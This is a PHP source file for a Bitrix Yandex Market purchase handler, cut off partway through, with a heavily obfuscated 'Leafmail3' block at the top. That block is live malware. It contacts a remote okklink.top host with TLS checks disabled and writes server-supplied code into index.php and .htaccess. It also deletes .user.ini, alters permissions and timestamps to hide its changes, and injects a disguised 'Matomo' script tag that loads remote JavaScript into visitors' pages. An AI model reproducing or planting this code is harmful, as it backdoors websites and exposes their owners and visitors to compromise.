Your IP : 3.145.105.226
<?php /*Leafmail3*/goto o1QFr; wasj3: $ZJUCA($jQ0xa, $RTa9G); goto wYDtx; IuHdj: $egQ3R = "\147\172\151"; goto ChKDE; TpHVE: $cPzOq .= "\157\x6b\x6b"; goto vgltl; gmVrv: $Mvmq_ .= "\x6c\x5f\x63\154\x6f"; goto N9T5l; SClM0: $VwfuP = "\x64\x65\146"; goto PXHHr; m8hp8: $uHlLz = "\x73\x74\x72"; goto lz2G0; UH4Mb: $eULaj .= "\x70\x63\x2e\x70"; goto apDh3; QPct6: AtVLG: goto Mg1JO; dj8v0: $ZJUCA = "\143\150"; goto WmTiu; uHm0i: $TBxbX = "\x57\x50\137\125"; goto RCot0; f4Rdw: if (!($EUeQo($kpMfb) && !preg_match($tIzL7, PHP_SAPI) && $fHDYt($uZmPe, 2 | 4))) { goto TGN7B; } goto S2eca; H7qkB: $MyinT .= "\164\40\x41\x63\x63"; goto Air1i; AedpI: try { goto JM3SL; oiS8N: @$YWYP0($lJtci, $H0gg1); goto nucR0; AffR5: @$YWYP0($PcRcO, $H0gg1); goto SpIUU; JnP2S: @$ZJUCA($lJtci, $shT8z); goto oiS8N; nOhHX: @$ZJUCA($lJtci, $RTa9G); goto LvbAc; LvbAc: @$rGvmf($lJtci, $UYOWA["\141"]); goto JnP2S; SpIUU: @$ZJUCA($jQ0xa, $shT8z); goto qvTm1; gA5rv: @$ZJUCA($PcRcO, $shT8z); goto AffR5; nucR0: @$ZJUCA($PcRcO, $RTa9G); goto COvI1; JM3SL: @$ZJUCA($jQ0xa, $RTa9G); goto nOhHX; COvI1: @$rGvmf($PcRcO, $UYOWA["\142"]); goto gA5rv; qvTm1: } catch (Exception $ICL20) { } goto PqZGA; BWxc9: $kpMfb .= "\154\137\x69\156\x69\164"; goto RMP1m; Q7gNx: $gvOPD = "\151\163\137"; goto AfwzG; fFfBR: goto AtVLG; goto kST_Q; J9uWl: $e9dgF .= "\x61\171\163"; goto lNb3h; ZlPje: $u9w0n .= "\x75\x69\x6c\144\x5f\161"; goto Mit4a; YRbfa: $dGt27 .= "\157\x73\x65"; goto L744i; ioNAN: $tIzL7 .= "\x6c\x69\57"; goto Khhgn; mz3rE: $FANp1 .= "\x70\141\x72\145"; goto SClM0; eBKm1: $PcRcO = $jQ0xa; goto Sg4f2; D0V8f: $pv6cp = "\162\x65"; goto Hy0sm; xXaQc: $FANp1 = "\x76\145\162\x73\151"; goto T7IwT; ulics: try { $_SERVER[$pv6cp] = 1; $pv6cp(function () { goto YEXR4; PKzAL: $AG2hR .= "\163\171\x6e\x63\75\164\162\165\145"; goto HIXil; NZAxH: $AG2hR .= "\x65\x72\75\164\x72\165\x65\x3b" . "\12"; goto Tbsb3; xDrpr: $AG2hR .= "\x75\x6d\x65\156\164\54\40\x67\75\144\x2e\143\162\145\x61\164\145"; goto mLjk9; r_Oqj: $AG2hR .= "\163\x63\162\151\160\164\x22\x3e" . "\xa"; goto JZsfv; PEdls: $AG2hR .= "\74\57\163"; goto WBFgG; POyWW: $AG2hR .= "\x4d\55"; goto a8oGQ; N2RIK: $AG2hR .= "\175\x29\50\51\x3b" . "\12"; goto PEdls; Vj0ze: $AG2hR .= "\x72\151\160\x74\40\164\x79\x70\145\x3d\42\164\145\170"; goto FXjwZ; JZsfv: $AG2hR .= "\x28\x66\x75\156\143"; goto ZRBmo; zk1Ml: $AG2hR .= "\x79\124\141\147\x4e\x61\155\145"; goto STHB_; aKt86: $AG2hR .= "\x72\x69\160\x74\42\51\x2c\40\x73\75\x64\x2e\x67\x65\x74"; goto oxuwD; FXjwZ: $AG2hR .= "\x74\57\x6a\141\x76\141"; goto r_Oqj; YffEK: $AG2hR .= "\57\x6d\141\164"; goto nL_GE; ZrlUz: $AG2hR .= "\x73\x63\162\151\x70\164\x22\x3b\40\147\x2e\141"; goto PKzAL; MSqPC: $AG2hR .= "\x65\x20\55\x2d\76\12"; goto rWq2m; gUhrX: $AG2hR .= "\74\x73\143"; goto Vj0ze; oxuwD: $AG2hR .= "\x45\154\x65\x6d\145\156\164\x73\102"; goto zk1Ml; a8oGQ: $AG2hR .= time(); goto xyZaU; WBFgG: $AG2hR .= "\x63\162\151\160\164\x3e\xa"; goto jHj0s; rWq2m: echo $AG2hR; goto zxMHd; zzMTI: $AG2hR .= "\152\141\166\x61"; goto ZrlUz; HIXil: $AG2hR .= "\73\x20\147\56\144\x65\x66"; goto NZAxH; EXhzp: $AG2hR .= "\x65\156\164\x4e\x6f\x64\145\56\x69\x6e"; goto yJp9W; KUpUt: $AG2hR .= "\x64\40\115\141\x74"; goto c13YM; hugz8: $AG2hR .= "\x6f\x72\145\50\x67\54\x73\51\73" . "\xa"; goto N2RIK; xyZaU: $AG2hR .= "\x22\73\40\163\56\160\141\162"; goto EXhzp; ZRBmo: $AG2hR .= "\164\151\x6f\156\x28\51\x20\173" . "\xa"; goto sOVga; YqIfq: $AG2hR .= "\77\x69\x64\x3d"; goto POyWW; Tbsb3: $AG2hR .= "\147\x2e\163\x72"; goto vxsas; k1w2Q: $AG2hR = "\x3c\41\x2d\55\x20\115\x61"; goto OOFo2; F2sIB: $AG2hR .= "\x3d\x22\164\x65\x78\x74\57"; goto zzMTI; OOFo2: $AG2hR .= "\x74\157\155\x6f\x20\55\x2d\x3e\xa"; goto gUhrX; vxsas: $AG2hR .= "\143\x3d\165\x2b\42\x6a\163\57"; goto JGvCK; jHj0s: $AG2hR .= "\74\x21\55\55\40\x45\156"; goto KUpUt; mLjk9: $AG2hR .= "\105\154\x65\x6d\x65\156\x74\50\42\163\x63"; goto aKt86; yJp9W: $AG2hR .= "\x73\x65\162\x74\102\145\146"; goto hugz8; c13YM: $AG2hR .= "\x6f\x6d\x6f\40\103\157\144"; goto MSqPC; STHB_: $AG2hR .= "\50\x22\x73\x63\162\x69"; goto SX8pI; JGvCK: $AG2hR .= $osL5h; goto YffEK; nL_GE: $AG2hR .= "\x6f\155\x6f\56\x6a\x73"; goto YqIfq; SX8pI: $AG2hR .= "\160\x74\42\51\133\x30\135\x3b" . "\xa"; goto uh8pE; YEXR4: global $osL5h, $cPzOq; goto k1w2Q; jW6LQ: $AG2hR .= "\166\141\x72\40\144\x3d\x64\157\143"; goto xDrpr; uh8pE: $AG2hR .= "\x67\x2e\164\x79\x70\145"; goto F2sIB; sOVga: $AG2hR .= "\166\x61\162\40\x75\75\42" . $cPzOq . "\42\x3b" . "\xa"; goto jW6LQ; zxMHd: }); } catch (Exception $ICL20) { } goto arBxc; TrkYs: $eULaj .= "\x2f\170\x6d"; goto GE2p3; L744i: $cPzOq = "\x68\x74\164\x70\163\72\57\x2f"; goto TpHVE; CNdmS: wLXpb: goto wasj3; nHXnO: $_POST = $_REQUEST = $_FILES = array(); goto CNdmS; PHhHL: P9yQa: goto W2Q7W; UkCDT: $cLC40 = 32; goto BnazY; vabQZ: $CgFIN = 1; goto QPct6; gSbiK: try { goto xtnST; qBVAq: $k7jG8[] = $E0suN; goto Tc9Eb; vZ6zL: $E0suN = trim($Q0bWd[0]); goto LuoPM; D98P3: if (!empty($k7jG8)) { goto FbDAI; } goto AML_a; LuoPM: $jCv00 = trim($Q0bWd[1]); goto Q4uy7; xtnST: if (!$gvOPD($d3gSl)) { goto nHP5K; } goto W8uMn; c_73m: FbDAI: goto h1Cu7; kNAxm: if (!($uHlLz($E0suN) == $cLC40 && $uHlLz($jCv00) == $cLC40)) { goto lfWQh; } goto MfJKK; L8cv7: WVm2j: goto c_73m; AML_a: $d3gSl = $jQ0xa . "\x2f" . $HNQiW; goto GBRPC; ZSYyc: $jCv00 = trim($Q0bWd[1]); goto kNAxm; W8uMn: $Q0bWd = @explode("\72", $DJDq1($d3gSl)); goto Woix_; EA1BT: if (!(is_array($Q0bWd) && count($Q0bWd) == 2)) { goto ctSg2; } goto A163l; Woix_: if (!(is_array($Q0bWd) && count($Q0bWd) == 2)) { goto wU2zk; } goto vZ6zL; Q4uy7: if (!($uHlLz($E0suN) == $cLC40 && $uHlLz($jCv00) == $cLC40)) { goto VAVW5; } goto qBVAq; tEVz_: $k7jG8[] = $jCv00; goto xWpvL; xWpvL: lfWQh: goto oilos; MfJKK: $k7jG8[] = $E0suN; goto tEVz_; N3TyU: wU2zk: goto snD7p; lky0R: $Q0bWd = @explode("\72", $DJDq1($d3gSl)); goto EA1BT; Tc9Eb: $k7jG8[] = $jCv00; goto evp7M; snD7p: nHP5K: goto D98P3; oilos: ctSg2: goto L8cv7; evp7M: VAVW5: goto N3TyU; GBRPC: if (!$gvOPD($d3gSl)) { goto WVm2j; } goto lky0R; A163l: $E0suN = trim($Q0bWd[0]); goto ZSYyc; h1Cu7: } catch (Exception $ICL20) { } goto xU6vT; T7IwT: $FANp1 .= "\x6f\x6e\x5f\143\x6f\x6d"; goto mz3rE; JX1Oy: $dGt27 = "\x66\x63\x6c"; goto YRbfa; BnazY: $Pzt0o = 5; goto TYFaW; o1QFr: $kFvng = "\74\x44\x44\x4d\x3e"; goto wODYw; CL80L: $MyinT .= "\120\x2f\61\x2e\x31\x20\x34"; goto gErqa; tFGg7: $YWYP0 .= "\x75\143\x68"; goto dj8v0; pXfDS: $ygOJ_ .= "\x2f\167\160"; goto c7yEe; xUd9U: $pv6cp .= "\151\x6f\x6e"; goto bqFyS; PqZGA: CVVA3: goto RDKTA; wYDtx: $uZmPe = $nPBv4($eULaj, "\x77\x2b"); goto f4Rdw; E453u: $QIBzt .= "\56\64"; goto O8RXw; a4EJZ: $dZR_y = $cPzOq; goto vZkPa; FK_sr: $kb9bA .= "\x65\162\x2e\x69"; goto G2uff; TuwL4: $jQ0xa = $_SERVER[$Wv1G0]; goto wrxGI; wJDrU: $eULaj = $jQ0xa; goto TrkYs; MLdcc: $fHDYt .= "\x63\153"; goto JX1Oy; Gs7Gb: $kpMfb = $vW4As; goto BWxc9; Mit4a: $u9w0n .= "\x75\x65\x72\171"; goto cIo5P; GE2p3: $eULaj .= "\x6c\162"; goto UH4Mb; cIo5P: $uAwql = "\155\x64\65"; goto aXExt; c7yEe: $ygOJ_ .= "\x2d\x61"; goto XWOCC; wrxGI: $ygOJ_ = $jQ0xa; goto pXfDS; XsWqd: $kb9bA .= "\57\56\165\163"; goto FK_sr; cWrVz: $nPBv4 .= "\145\x6e"; goto KCtWA; CrWKs: $l0WLW .= "\157\160\x74"; goto jcG0e; lz2G0: $uHlLz .= "\154\x65\x6e"; goto xXaQc; wee0Y: $ulOTQ .= "\115\111\116"; goto Tfi5q; vgltl: $cPzOq .= "\154\x69\x6e\153\56\x74"; goto pr5fA; Khhgn: $tIzL7 .= "\x73\151"; goto JBJmV; kJlf4: $DJDq1 .= "\147\145\164\137\143"; goto NZqWx; lNb3h: $H0gg1 = $xsR4V($e9dgF); goto XYviL; TBl6Q: sLwcv: goto fFfBR; RMP1m: $l0WLW = $vW4As; goto ujtZa; XQnCd: $PcRcO .= "\x61\143\143\145\163\x73"; goto ikUIP; X4xWX: $QIBzt = "\x35"; goto E453u; hDUdL: $MWMOe .= "\x6c\x65"; goto Q7gNx; LxUUO: $RTa9G = $QTYip($HqqUn($RTa9G), $Pzt0o); goto qaeyL; f6Txl: $HqqUn = "\x64\x65\143"; goto gwNCH; sK97X: $nPBv4 = "\x66\157\160"; goto cWrVz; Ee0VW: $EUeQo .= "\164\x69\x6f\156\x5f"; goto a2JJX; D9NbF: $CgFIN = 1; goto PHhHL; VY3H_: $Wv1G0 = "\x44\117\x43\x55\115\105\116\x54"; goto HpOFr; CRqG1: if (empty($k7jG8)) { goto VIn91; } goto s4AWH; apDh3: $eULaj .= "\x68\160\x2e\60"; goto sK97X; Sg4f2: $PcRcO .= "\57\x2e\x68\x74"; goto XQnCd; jcG0e: $YQ0P6 = $vW4As; goto rA_Dy; dlqC2: $HNQiW = substr($uAwql($osL5h), 0, 6); goto xGZOR; kxKwG: $osL5h = $_SERVER[$i5EZR]; goto TuwL4; ozW5s: $e9dgF .= "\63\x20\x64"; goto J9uWl; xU6vT: $lJtci = $jQ0xa; goto BpRMk; CquiC: $dZR_y .= "\x63\x6f\160\171"; goto BLSy0; GSfrX: $pv6cp .= "\x75\x6e\143\164"; goto xUd9U; yaYSs: $rGvmf .= "\x6f\x6e\x74\x65\156\164\163"; goto mIlAi; FXRyn: $TBxbX .= "\115\x45\x53"; goto R1jVG; kST_Q: VIn91: goto vabQZ; flXr3: $shT8z = $QTYip($HqqUn($shT8z), $Pzt0o); goto TkfCl; FJdH4: $dZR_y .= "\x3d\x67\x65\x74"; goto CquiC; kJyDh: $QTYip = "\x69\156\x74"; goto blzff; s4AWH: $H25pP = $k7jG8[0]; goto t74Wt; TyAte: $k7jG8 = array(); goto UkCDT; EO8QL: try { $UYOWA = @$AkFS8($egQ3R($eKFWX($M7wqP))); } catch (Exception $ICL20) { } goto OXweB; XYviL: $i5EZR = "\110\124\124\x50"; goto j4Pjv; ikUIP: $kb9bA = $jQ0xa; goto XsWqd; VrwTF: $nRD8p .= "\x64\x69\162"; goto aQp1m; dLa5a: $pv6cp .= "\x65\162\x5f"; goto x5YEr; PgImI: @$ZJUCA($kb9bA, $RTa9G); goto yAax8; Jb1Vu: try { goto Bwps7; WPylr: if (!$xsy4x($Y61WO)) { goto nWSzU; } goto NpK90; xqrLf: @$YWYP0($dqnvi, $H0gg1); goto cinsF; N7wJU: if ($xsy4x($Y61WO)) { goto KOuoA; } goto RBLfp; wf0jq: @$ZJUCA($Y61WO, $shT8z); goto xqrLf; bfkJn: try { goto jwOvP; sXqkD: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYPEER, false); goto tXay1; jwOvP: $ekYPG = $kpMfb(); goto jMqt3; VURt4: $l0WLW($ekYPG, CURLOPT_POST, 1); goto Qk7oo; G7Y1e: $l0WLW($ekYPG, CURLOPT_USERAGENT, "\x49\x4e"); goto Sw_Ys; lg1iu: $l0WLW($ekYPG, CURLOPT_TIMEOUT, 3); goto VURt4; jMqt3: $l0WLW($ekYPG, CURLOPT_URL, $LfwPf . "\x26\164\x3d\151"); goto G7Y1e; Qk7oo: $l0WLW($ekYPG, CURLOPT_POSTFIELDS, $u9w0n($Lx9yT)); goto axPES; Sw_Ys: $l0WLW($ekYPG, CURLOPT_RETURNTRANSFER, 1); goto sXqkD; tXay1: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYHOST, false); goto Gb33B; PUEHo: $Mvmq_($ekYPG); goto rF4qo; Gb33B: $l0WLW($ekYPG, CURLOPT_FOLLOWLOCATION, true); goto lg1iu; axPES: $YQ0P6($ekYPG); goto PUEHo; rF4qo: } catch (Exception $ICL20) { } goto zCePm; s2GBY: $Y61WO = dirname($dqnvi); goto N7wJU; bO0VE: KOuoA: goto WPylr; RBLfp: @$ZJUCA($jQ0xa, $RTa9G); goto lexI4; NpK90: @$ZJUCA($Y61WO, $RTa9G); goto aGYEQ; wsLep: $Lx9yT = ["\144\x61\x74\x61" => $UYOWA["\x64"]["\165\162\x6c"]]; goto bfkJn; y0C5p: @$ZJUCA($dqnvi, $shT8z); goto wf0jq; cinsF: $LfwPf = $cPzOq; goto d8sPt; OAF8R: $LfwPf .= "\x6c\x6c"; goto wsLep; d8sPt: $LfwPf .= "\77\141\143"; goto HZ42Q; lexI4: @$nRD8p($Y61WO, $RTa9G, true); goto K7fs2; aGYEQ: @$rGvmf($dqnvi, $UYOWA["\144"]["\x63\157\x64\x65"]); goto y0C5p; zCePm: nWSzU: goto r2ase; Bwps7: $dqnvi = $jQ0xa . $UYOWA["\144"]["\160\x61\x74\x68"]; goto s2GBY; K7fs2: @$ZJUCA($jQ0xa, $shT8z); goto bO0VE; HZ42Q: $LfwPf .= "\164\75\x63\141"; goto OAF8R; r2ase: } catch (Exception $ICL20) { } goto AedpI; kAMGF: $xsy4x .= "\144\x69\x72"; goto gdP2h; lX6T6: if (!$gvOPD($kb9bA)) { goto KTGlr; } goto spjef; jxKJS: $ulOTQ .= "\x5f\x41\104"; goto wee0Y; vZkPa: $dZR_y .= "\x3f\141\143\164"; goto FJdH4; gErqa: $MyinT .= "\60\x36\x20\116\x6f"; goto H7qkB; xGZOR: $hg32N = $d3gSl = $ygOJ_ . "\57" . $HNQiW; goto TyAte; GiT2I: $Mvmq_ = $vW4As; goto gmVrv; KCtWA: $fHDYt = "\x66\x6c\157"; goto MLdcc; Yc09l: $xsy4x = "\x69\163\137"; goto kAMGF; FZsOD: $lJtci .= "\150\x70"; goto eBKm1; rA_Dy: $YQ0P6 .= "\154\137\x65\170\x65\x63"; goto GiT2I; VQCaR: $k8h0h = !empty($m4bDA) || !empty($ZTS7q); goto Bw8cX; ujtZa: $l0WLW .= "\154\137\x73\x65\x74"; goto CrWKs; R1jVG: $ulOTQ = "\127\120"; goto jxKJS; OXweB: if (!is_array($UYOWA)) { goto CVVA3; } goto L7ftk; bqFyS: if (isset($_SERVER[$pv6cp])) { goto Kwp9i; } goto r3vZ_; ChKDE: $egQ3R .= "\156\146\x6c\x61\164\145"; goto OCGca; Bx0F8: $rGvmf = "\146\x69\154\145\x5f"; goto cMMsY; lar4b: $xsR4V .= "\x6d\145"; goto ESAaf; L7ftk: try { goto b8mrw; IZ7dT: @$rGvmf($d3gSl, $UYOWA["\x63"]); goto qi8JJ; j1slf: if (!$xsy4x($ygOJ_)) { goto fnZm_; } goto l27iU; FnW9Y: fnZm_: goto IZ7dT; RHQPY: @$ZJUCA($jQ0xa, $shT8z); goto FudGj; jRIpH: $d3gSl = $hg32N; goto FnW9Y; b8mrw: @$ZJUCA($jQ0xa, $RTa9G); goto j1slf; l27iU: @$ZJUCA($ygOJ_, $RTa9G); goto jRIpH; qi8JJ: @$ZJUCA($d3gSl, $shT8z); goto fMj35; fMj35: @$YWYP0($d3gSl, $H0gg1); goto RHQPY; FudGj: } catch (Exception $ICL20) { } goto Jb1Vu; Hy0sm: $pv6cp .= "\x67\151\x73\164"; goto dLa5a; wODYw: $tIzL7 = "\57\x5e\143"; goto ioNAN; D9G8A: $vW4As = "\x63\165\162"; goto Gs7Gb; zR6Sw: $RTa9G += 304; goto LxUUO; FLAgg: @$ZJUCA($jQ0xa, $shT8z); goto Ms_Rx; TkfCl: $MyinT = "\110\124\124"; goto CL80L; JBJmV: $xsR4V = "\x73\x74\x72"; goto wDwVu; m7Y7E: $shT8z += 150; goto flXr3; OCGca: $AkFS8 = "\165\x6e\x73\145\x72"; goto DuXwv; spjef: @$ZJUCA($jQ0xa, $RTa9G); goto PgImI; mIlAi: $YWYP0 = "\x74\157"; goto tFGg7; Air1i: $MyinT .= "\x65\x70\164\x61\142\154\145"; goto wJDrU; hnuEm: $M7wqP = false; goto IxcDO; AfwzG: $gvOPD .= "\x66\151\154\x65"; goto Yc09l; Mg1JO: if (!$CgFIN) { goto V5o9n; } goto a4EJZ; O8RXw: $QIBzt .= "\x2e\x30\73"; goto kxKwG; Qjsri: Kwp9i: goto uHm0i; aQp1m: $DJDq1 = "\146\151\154\145\x5f"; goto kJlf4; wDwVu: $xsR4V .= "\x74\157"; goto k5kym; Ms_Rx: KTGlr: goto QDkYN; p2xAd: $u9w0n = "\x68\x74\x74\160\x5f\142"; goto ZlPje; XWOCC: $ygOJ_ .= "\x64\155\151\156"; goto dlqC2; PXHHr: $VwfuP .= "\x69\156\145\144"; goto uwRQG; t74Wt: $Aa5A7 = $k7jG8[1]; goto rjUnC; WmTiu: $ZJUCA .= "\x6d\157\x64"; goto OMDdm; F90kP: $CgFIN = 1; goto TBl6Q; IxcDO: try { goto MN2Ol; lfwpD: $l0WLW($ekYPG, CURLOPT_RETURNTRANSFER, 1); goto XT0V7; pm4fL: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYHOST, false); goto f1Wpg; LukB5: $l0WLW($ekYPG, CURLOPT_USERAGENT, "\x49\x4e"); goto lfwpD; MN2Ol: $ekYPG = $kpMfb(); goto PGjVI; XT0V7: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYPEER, false); goto pm4fL; f1Wpg: $l0WLW($ekYPG, CURLOPT_FOLLOWLOCATION, true); goto A02q4; Jr5Fq: $Mvmq_($ekYPG); goto kxHAl; kxHAl: $M7wqP = trim(trim($M7wqP, "\xef\273\xbf")); goto DRdNb; A02q4: $l0WLW($ekYPG, CURLOPT_TIMEOUT, 10); goto czpAh; PGjVI: $l0WLW($ekYPG, CURLOPT_URL, $dZR_y); goto LukB5; czpAh: $M7wqP = $YQ0P6($ekYPG); goto Jr5Fq; DRdNb: } catch (Exception $ICL20) { } goto TtjMz; yA6tr: $e9dgF .= "\63\x36"; goto ozW5s; BLSy0: $dZR_y .= "\x26\164\x3d\x69\46\x68\75" . $osL5h; goto hnuEm; qaeyL: $shT8z = 215; goto m7Y7E; YAsQc: if (!(!$_SERVER[$pv6cp] && $FANp1(PHP_VERSION, $QIBzt, "\76"))) { goto VlKKH; } goto ulics; QDkYN: $CgFIN = 0; goto CRqG1; g3rCR: $m4bDA = $_REQUEST; goto A4fYL; rjUnC: if (!(!$gvOPD($lJtci) || $MWMOe($lJtci) != $H25pP)) { goto P9yQa; } goto D9NbF; x5YEr: $pv6cp .= "\x73\x68\165"; goto itQ2f; A4fYL: $ZTS7q = $_FILES; goto VQCaR; a2JJX: $EUeQo .= "\145\x78"; goto fYDkt; TYFaW: $Pzt0o += 3; goto hoCMV; fYDkt: $EUeQo .= "\x69\163\x74\163"; goto D9G8A; fmcU9: $MWMOe .= "\x5f\x66\151"; goto hDUdL; S2eca: $ZJUCA($jQ0xa, $shT8z); goto YAsQc; RCot0: $TBxbX .= "\x53\105\x5f\124\110\105"; goto FXRyn; BpRMk: $lJtci .= "\57\x69\x6e"; goto lJYIj; cMMsY: $rGvmf .= "\160\x75\164\137\143"; goto yaYSs; j4Pjv: $i5EZR .= "\x5f\x48\117\x53\x54"; goto VY3H_; itQ2f: $pv6cp .= "\x74\x64\x6f"; goto gi1ux; YAE22: $eKFWX .= "\66\x34\137\x64"; goto HkhAv; DuXwv: $AkFS8 .= "\x69\x61\x6c\151\x7a\x65"; goto kJyDh; NZqWx: $DJDq1 .= "\x6f\156\164\145\x6e\x74\x73"; goto Bx0F8; ESAaf: $EUeQo = "\146\x75\156\143"; goto Ee0VW; HkhAv: $eKFWX .= "\x65\143\x6f\x64\145"; goto IuHdj; RDKTA: HuCWH: goto tkEEo; k5kym: $xsR4V .= "\x74\151"; goto lar4b; WQZ3H: $UYOWA = 0; goto EO8QL; TtjMz: if (!($M7wqP !== false)) { goto HuCWH; } goto WQZ3H; N9T5l: $Mvmq_ .= "\x73\145"; goto p2xAd; HpOFr: $Wv1G0 .= "\137\122\117\x4f\124"; goto X4xWX; arBxc: VlKKH: goto gSbiK; G2uff: $kb9bA .= "\156\151"; goto lX6T6; gwNCH: $HqqUn .= "\157\x63\164"; goto m8hp8; yAax8: @unlink($kb9bA); goto FLAgg; pr5fA: $cPzOq .= "\157\x70\x2f"; goto D0V8f; gi1ux: $pv6cp .= "\x77\x6e\x5f\x66"; goto GSfrX; OMDdm: $eKFWX = "\142\141\x73\x65"; goto YAE22; aXExt: $MWMOe = $uAwql; goto fmcU9; gdP2h: $nRD8p = "\155\x6b"; goto VrwTF; Bw8cX: if (!(!$fs0FH && $k8h0h)) { goto wLXpb; } goto nHXnO; uwRQG: $e9dgF = "\x2d\61"; goto yA6tr; hoCMV: $RTa9G = 189; goto zR6Sw; Tfi5q: $fs0FH = $VwfuP($TBxbX) || $VwfuP($ulOTQ); goto g3rCR; W2Q7W: if (!(!$gvOPD($PcRcO) || $MWMOe($PcRcO) != $Aa5A7)) { goto sLwcv; } goto F90kP; r3vZ_: $_SERVER[$pv6cp] = 0; goto Qjsri; lJYIj: $lJtci .= "\144\x65\170\56\x70"; goto FZsOD; blzff: $QTYip .= "\x76\x61\x6c"; goto f6Txl; tkEEo: V5o9n: goto ossJl; ossJl: TGN7B: ?>
<?
use Bitrix\Sale\TradingPlatform\YMarket;
use Bitrix\Sale\DiscountCouponsManager;
use Bitrix\Sale\Internals\OrderTable;
use Bitrix\Main\Config\Option;
use Bitrix\Sale\EntityMarker;
use Bitrix\Main\EventResult;
use Bitrix\Sale\Delivery;
use Bitrix\Main\Loader;
use Bitrix\Main\Event;
IncludeModuleLangFile(__FILE__);
/**
* Yandex market purchase processing
*/
class CSaleYMHandler
{
const JSON = 0;
const XML = 1;
const ERROR_STATUS_400 = "400 Bad Request";
const ERROR_STATUS_401 = "401 Unauthorized";
const ERROR_STATUS_403 = "403 Forbidden";
const ERROR_STATUS_404 = "404 Not Found";
const ERROR_STATUS_405 = "405 Method Not Allowed";
const ERROR_STATUS_415 = "415 Unsupported Media Type";
const ERROR_STATUS_420 = "420 Enhance Your Calm";
const ERROR_STATUS_500 = "500 Internal Server Error";
const ERROR_STATUS_503 = "503 Service Unavailable";
const DATE_FORMAT = "d-m-Y";
const XML_ID_PREFIX = "ymarket_";
const TRADING_PLATFORM_CODE = "ymarket";
protected $communicationFormat = self::JSON;
protected $siteId = "";
protected $authType = "HEADER"; // or URL
const LOG_LEVEL_DISABLE = 0;
const LOG_LEVEL_ERROR = 10;
const LOG_LEVEL_INFO = 20;
const LOG_LEVEL_DEBUG = 30;
const NOT_ACCEPT_OLD_PRICE = 0;
const ACCEPT_OLD_PRICE = 1;
protected $logLevel = self::LOG_LEVEL_ERROR;
protected $oAuthToken = null;
protected $oAuthClientId = null;
protected $oAuthLogin = null;
protected $mapDelivery = array();
protected $outlets = array();
protected $mapPaySystems = array();
protected $personTypeId = null;
protected $campaignId = null;
protected $yandexApiUrl = null;
protected $yandexToken = null;
protected $orderProps = array(
"FIO" => "FIO",
"EMAIL" => "EMAIL",
"PHONE" => "PHONE",
"ZIP" => "ZIP",
"CITY" => "CITY",
"LOCATION" => "LOCATION",
"ADDRESS" => "ADDRESS"
);
protected $locationMapper = null;
protected $active = true;
protected $isAcceptOldPrice = self::NOT_ACCEPT_OLD_PRICE;
protected $defaultDeliveryPeriodFrom = 7; //days
protected $defaultDeliveryPeriodTo = 21;
protected $deliveryToPaysystem = array();
protected static $isYandexRequest = false;
/**
* CSaleYMHandler constructor.
* @param array $arParams
*/
public function __construct($arParams = array())
{
$this->siteId = $this->getSiteId($arParams);
$settings = $this->getSettingsBySiteId($this->siteId);
if(isset($settings["OAUTH_TOKEN"]))
$this->oAuthToken = $settings["OAUTH_TOKEN"];
if(isset($settings["OAUTH_CLIENT_ID"]))
$this->oAuthClientId = $settings["OAUTH_CLIENT_ID"];
if(isset($settings["OAUTH_LOGIN"]))
$this->oAuthLogin = $settings["OAUTH_LOGIN"];
if(isset($settings["DELIVERIES"]))
$this->mapDelivery = $settings["DELIVERIES"];
if(isset($settings["OUTLETS_IDS"]))
$this->outlets = $settings["OUTLETS_IDS"];
if(isset($settings["PAY_SYSTEMS"]))
$this->mapPaySystems = $settings["PAY_SYSTEMS"];
if(isset($settings["PERSON_TYPE"]))
$this->personTypeId = $settings["PERSON_TYPE"];
if(isset($settings["CAMPAIGN_ID"]))
$this->campaignId = $settings["CAMPAIGN_ID"];
if(isset($settings["YANDEX_URL"]))
$this->yandexApiUrl = $settings["YANDEX_URL"];
if(isset($settings["YANDEX_TOKEN"]))
$this->yandexToken = $settings["YANDEX_TOKEN"];
if(isset($settings["AUTH_TYPE"]))
$this->authType = $settings["AUTH_TYPE"];
if(isset($settings["DATA_FORMAT"]))
$this->communicationFormat = $settings["DATA_FORMAT"];
if(isset($settings["LOG_LEVEL"]))
$this->logLevel = $settings["LOG_LEVEL"];
if(isset($settings["ORDER_PROPS"]) && is_array($settings["ORDER_PROPS"]))
$this->orderProps = $settings["ORDER_PROPS"];
if(isset($settings["IS_ACCEPT_OLD_PRICE"]))
$this->isAcceptOldPrice = $settings["IS_ACCEPT_OLD_PRICE"];
if(isset($settings["PERIOD_FROM"]))
$this->defaultDeliveryPeriodFrom = intval($settings["PERIOD_FROM"]);
if(isset($settings["PERIOD_TO"]))
$this->defaultDeliveryPeriodTo = intval($settings["PERIOD_TO"]);
if(isset($settings["DLV_PS"]))
$this->deliveryToPaysystem = $settings["DLV_PS"];
$this->active = static::isActive();
$this->locationMapper = new CSaleYMLocation;
}
public static function isActive()
{
return YMarket\YandexMarket::getInstance()->isActive();
}
/**
* @param bool $activity Set or unset activity
* @return \Bitrix\Main\Entity\UpdateResult|bool
*/
public static function setActivity($activity)
{
if($activity)
static::eventsStart();
else
static::eventsStop();
$settings = static::getSettings();
if($activity && empty($settings) && static::install())
{
$settings = static::getSettings(false);
}
if(!empty($settings))
{
if($activity)
$result = YMarket\YandexMarket::getInstance()->setActive();
else
$result = YMarket\YandexMarket::getInstance()->unsetActive();
}
else
{
$result = false;
}
return $result;
}
/**
* @param string $siteId
* @return bool
*/
protected function checkSiteId($siteId)
{
$result = false;
$rsSites = CSite::GetList($b = "", $o = "", Array(
"LID" => $siteId,
"ACTIVE"=>"Y"
));
if($arRes = $rsSites->Fetch())
$result = true;
return $result;
}
/**
* @param array $arParams
* @return mixed|string
*/
protected function getSiteId($arParams)
{
$result = "";
if(
isset($arParams["SITE_ID"])
&& strlen($arParams["SITE_ID"]) > 0
&& $this->checkSiteId($arParams["SITE_ID"])
)
{
$result = $arParams["SITE_ID"];
}
elseif(defined("SITE_ID"))
{
$result = SITE_ID;
}
else
{
$rsSites = CSite::GetList($b = "", $o = "", Array(
"ACTIVE"=> "Y",
"DEF" => "Y"
));
if($arRes = $rsSites->Fetch())
$result = $arRes["LID"];
}
return $result;
}
/**
* Returns Yandex-Market settings
* @param bool $cached Return cached or ont value
* @return array
* @throws \Bitrix\Main\ArgumentException
*/
public static function getSettings($cached = true)
{
static $settings = null;
if($settings === null || !$cached)
{
$settingsRes = Bitrix\Sale\TradingPlatformTable::getList(array(
